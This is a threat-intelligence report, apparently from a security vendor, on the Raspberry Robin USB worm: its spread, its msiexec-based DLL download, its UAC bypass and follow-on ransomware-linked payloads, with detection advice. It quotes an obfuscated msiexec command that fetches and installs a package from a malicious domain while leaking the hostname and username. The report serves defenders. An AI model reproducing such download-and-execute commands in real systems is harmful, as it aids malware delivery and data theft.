Raspberry Robin

Analysis

Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog published in May 2022. Following our post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial blog publication, Raspberry Robin evolved from a growing curiosity to a widely distributed malicious downloader. Raspberry Robin was Red Canary’s 7th most prevalent threat in 2022.

Raspberry Robin activity observed by Red Canary remained at a fairly consistent frequency between January and June of 2022. In the latter half of 2022, we saw a significant increase in activity, beginning in August. The six-month period of July through December 2022 saw, on average, a 114 percent increase in observed Raspberry Robin activity compared to the first 6 months of the year. There may be several reasons for this increase, the most likely being both a rise in actual Raspberry Robin infections as well as improved detection of the threat by Red Canary and other vendors.

Initial Raspberry Robin activity

A Raspberry Robin infection often starts when a user plugs an infected USB drive into their endpoint. Based on community feedback we received after our blog post, one common source for Raspberry Robin infections appears to be USB drives previously used at print shops and mailing centers. After the drive is connected, cmd.exe receives a command to read and execute a randomly named file with a seemingly random two-to-three character file extension. There is frequently additional whitespace in this command: cmd.exe /q/V/R TYPE QLiet.sAV|Cmd

The file is a LNK file that contains a distinctive Windows Installer (msiexec.exe) command. The msiexec command typically includes the following:

• mixed-case syntax
• a short domain containing only a few characters
• communication over port 8080
• a string of random alphanumeric characters potentially used as a token
• the victim hostname and/or username

Here is an example of what the command line might look like:

MsIEXeC /qUieT AjHodmv=Yn iXLspV=rSbH /fV "HtTp://Fnx[.]WF:8080/BKCFL/qnP6C9z/lfVeygFfdAE/<HOSTNAME>=<USERNAME>"

Diving into the DLL

If the outbound network connection is successful, msiexec.exe downloads and installs a randomly named malicious DLL, typically in C:\ProgramData\<randomly-named subdirectory>. The DLL name is two-to-eight random characters, followed by a three-character file extension. Extensions we’ve observed include .tmp, .etl, .log, and others. The Raspberry Robin DLL, also known as Roshtyak, can be executed by several different processes in an attempt to elevate privileges and bypass User Access Control (UAC), based on which type of evasion is most likely to be successful. Red Canary has observed fodhelper.exe and odbconf.exe used to execute the malicious DLL.

Follow-on payloads

The DLL has a wide variety of functions, including additional C2 activity, task creation for persistence, and the capability to download and execute additional payloads. In July 2022, Microsoft reported seeing SocGholish as a follow-on payload, observing activity resembling the group they track as DEV-0243, which is associated with the cybercriminal group known as Evil Corp. Red Canary also directly observed Raspberry Robin downloading a malicious SocGholish .js binary. This development significantly heightened the risk of a Raspberry Robin infection, making it a potential ransomware precursor based on historic DEV-0243 and SocGholish activity. In October 2022, Microsoft shared additional Raspberry Robin observations, most notably that they saw Raspberry Robin used in compromises with follow-on activity including BumbleBee, Cobalt Strike, and IcedID. Microsoft additionally reported that Raspberry Robin was observed in post-compromise activity attributed to DEV-0950, a group that overlaps with activity tracked as TA505.

If Raspberry Robin is detected in your environment, we recommend taking steps to block malicious network connections to help prevent follow-on activity and the download of malicious files. We also recommend removing malicious files from the infected system. If additional follow-on activity is detected in your environment, we recommend that you isolate the device. Rapid detection and response early in the infection chain prevents continued progression of this threat.

Detection opportunities

For additional detection opportunities beyond those listed below, see our Raspberry Robin blog post.

Windows Installer (msiexec.exe) downloading and executing packages

To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command-line interface will give you the opportunity to examine the activity and determine if it’s malicious or not.